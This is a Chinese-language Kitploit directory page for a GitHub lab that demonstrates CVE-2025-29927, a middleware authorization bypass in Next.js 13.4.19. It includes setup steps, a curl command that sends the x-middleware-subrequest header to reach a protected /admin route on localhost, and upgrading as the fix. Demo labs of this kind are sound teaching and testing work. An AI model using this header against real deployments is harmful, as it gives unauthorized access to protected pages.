Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
NextJS_CVE-2025-29927 — 演示了 Next.js 13.4.19 中 x-middleware-subrequest 请求头的绕过漏洞,允许未经授权访问受保护的路由。包含环境搭建、正常流程以及基于 curl 的利用步骤。 | Kitploit
工具/GitHubGitHub/all3njk/nextjs_cve-2025-29927
漏洞分析Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHuball3njk/nextjs_cve-2025-29927

NextJS_CVE-2025-29927

演示了 Next.js 13.4.19 中 x-middleware-subrequest 请求头的绕过漏洞,允许未经授权访问受保护的路由。包含环境搭建、正常流程以及基于 curl 的利用步骤。

查看仓库
61年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Next.js 授权绕过演示

此应用程序演示了 Next.js 13.4.19 中的 x-middleware-subrequest 漏洞,该漏洞可导致中间件保护被绕过。

设置

  1. 安装依赖:
root@kitploit:~
npm install
  1. 启动开发服务器:
root@kitploit:~
npm run dev

漏洞演示

该应用程序在 /admin 有一个管理页面,本应受到中间件保护。然而,使用 x-middleware-subrequest 请求头即可在未认证的情况下访问它。

正常流程

  1. 访问 /admin - 您将被重定向到 /login
  2. 使用任意凭据登录 - 您将被重定向到 /admin

绕过方法

要绕过认证,您可以使用 curl 或任何 HTTP 客户端发送带有 x-middleware-subrequest 请求头的请求:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin

安全影响

此漏洞演示了如何通过使用 x-middleware-subrequest 请求头绕过 Next.js 13.4.19 中的中间件保护。在生产环境中,这可能导致对受保护路由的未授权访问。

修复

要修复此漏洞,请升级到已修补该问题的新版 Next.js。

下载工具